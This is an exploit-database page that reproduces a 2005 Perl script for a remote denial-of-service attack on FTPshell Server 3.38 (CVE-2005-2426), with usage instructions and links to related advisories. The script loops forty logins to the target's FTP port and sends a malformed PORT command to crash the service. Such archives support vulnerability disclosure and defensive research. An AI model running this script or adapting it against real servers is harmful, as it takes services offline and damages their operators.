Lucene search
+L

FTPshell Server 3.38 - Remote Denial of Service

🗓️ 26 Jul 2005 00:00:00Reported by Reed ArvinType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

FTPshell Server 3.38 Remote DoS attack via FT

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2005-2426
3 Aug 200504:00
cve
Cvelist
CVE-2005-2426
3 Aug 200504:00
cvelist
EUVD
EUVD-2005-2427
7 Oct 202500:30
euvd
Tenable Nessus
FTPshell Server 3.38 Malformed PORT/QUIT DoS
27 Jul 200500:00
nessus
NVD
CVE-2005-2426
3 Aug 200504:00
nvd
#!/usr/bin/perl
#
# Usage: FTPShell_FTPDOS.pl <ip> <user> <pass>
#        FTPShell_FTPDOS.pl 127.0.0.1 hello moto
#
# FTPshell Server Version 3.38
#
# Download:
# http://www.ftpshell.com/
#
################################################

use IO::Socket;
use Win32;
use strict;

my($i)      = "";
my($socket) = "";

for ($i = 1; $i <= 40; $i++)
{
        if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                            PeerPort => "21",
                                            Proto    => "TCP"))
        {
                print "Login \#$i\n";

                Win32::Sleep(300);

                print $socket "USER $ARGV[1]\r\n";

                Win32::Sleep(100);

                print $socket "PASS $ARGV[2]\r\n";

                Win32::Sleep(100);

                print $socket "PORT 127,0,0,1,18,12\r\n";

                Win32::Sleep(100);

                close($socket);
        }
        else
        {
                print "Cannot connect to $ARGV[0]:21\n";
        }
}

# milw0rm.com [2005-07-26]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation